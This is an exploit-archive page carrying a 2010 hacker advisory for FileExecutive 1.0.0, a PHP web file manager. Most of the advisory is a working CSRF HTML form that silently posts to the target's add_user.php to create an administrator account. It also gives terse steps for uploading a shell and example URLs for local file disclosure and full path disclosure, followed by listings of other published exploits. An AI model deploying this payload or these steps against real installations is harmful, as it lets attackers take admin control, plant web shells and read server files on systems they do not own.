Menu

Search for hundreds of thousands of exploits

"FileExecutive 1 - Multiple Vulnerabilities"

Author

Exploit author

ViRuSMaN

Platform

Exploit platform

aix

Release date

Exploit published date

2010-02-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
==============================================================================
        [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
        [»] FileExecutive Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ FileExecutive v1.0.0 ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ FileExecutive is a web-based file manager written in PHP. ]
    [»] Download:           [ http://sourceforge.net/projects/fileexecutive/ ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploits ]===

Add/Edit Admin CSRF:

<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td>		<td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td>			<td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td>		<td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td>		<td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>

Shell Upload:

    [»] By Go To The End Of Page & Browse Your Shell 2 upload it   <-=- Remote File Upload Vulnerability

Local File Disclosure:

    [»] http://localhost/[path]/download.php?file=./LFD            <-=- Local File Disclosure Vulnerability

Full Path Disclosure:

    [»] http://localhost/[path]/listdir.php?dir=./FPD              <-=- Full Path Disclosure Vulnerability

Author: ViRuSMaN <-

###########################################################################
Release Date Title Type Platform Author
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2018-12-04 "Xorg X11 Server (AIX) - Local Privilege Escalation" local aix 0xdono
2017-03-07 "Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities" webapps aix RandoriSec
2016-12-22 "IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation" local aix "Hector X. Monsegur"
2015-10-30 "AIX 7.1 - 'lquerylv' Local Privilege Escalation" local aix "S2 Crew"
2015-09-08 "IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation" local aix "Kristian Erik Hermansen"
2014-11-24 "RobotStats 1.0 - HTML Injection" dos aix "ZoRLu Bugrahan"
2014-09-09 "PHP Stock Management System 1.02 - Multiple Vulnerabilities" dos aix jsass
2014-07-01 "Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure" dos aix "BGA Security"
Release Date Title Type Platform Author
2010-02-26 "FileExecutive 1 - Multiple Vulnerabilities" webapps aix ViRuSMaN
2010-02-23 "QuickDev 4 PHP - Database Disclosure" webapps php ViRuSMaN
2010-02-22 "phpBugTracker 1.0.1 - File Disclosure" webapps php ViRuSMaN
2010-02-22 "vBSEO 3.1.0 - Local File Inclusion" webapps php ViRuSMaN
2010-02-20 "FlatFile Login System - Remote Password Disclosure" webapps php ViRuSMaN
2010-02-20 "TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)" webapps php ViRuSMaN
2010-02-20 "Netzbrett - Database Disclosure" webapps php ViRuSMaN
2010-02-13 "ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion" webapps php ViRuSMaN
2010-02-11 "myPHP Guestbook 2.0.4 - Database Backup Dump" webapps php ViRuSMaN
2010-02-09 "NewsLetter Tailor - Authentication Bypass" webapps php ViRuSMaN
2010-02-09 "NewsLetter Tailor - Database Backup Dump" webapps php ViRuSMaN
2010-02-09 "fipsForum 2.6 - Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-23 "OpenDb 1.5.0.4 - Multiple Local File Inclusions" webapps php ViRuSMaN
2010-01-15 "Triburom - 'forum.php' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-14 "Joomla! Component com_marketplace 1.2 - 'catid' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-14 "Xforum 1.4 - 'nbpageliste' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-13 "Tribisur - 'cat' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-10 "Egreetings 1.0b - Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-10 "ABB 1.1 - Forum Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-10 "DigitalHive - 'mt' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-10 "E-membres 1.0 - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-27 "Joomla! Component com_dhforum - SQL Injection" webapps php ViRuSMaN
2009-12-24 "Snitz Forums 2000 - Database Disclosure" webapps asp ViRuSMaN
2009-12-24 "Web Wiz Forums 9.64 - Database Disclosure" webapps asp ViRuSMaN
2009-12-24 "Web Wiz NewsPad - Database Disclosure" webapps asp ViRuSMaN
2009-12-19 "Toast Forums 1.8 - Database Disclosure" webapps asp ViRuSMaN
2009-12-16 "GuestBookPro Script - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-16 "Codefixer Membership - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-14 "NAS Uploader 1.0/1.5 - Arbitrary File Upload" webapps linux ViRuSMaN
2009-12-14 "[WS] upload - Arbitrary File Upload" webapps linux ViRuSMaN
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.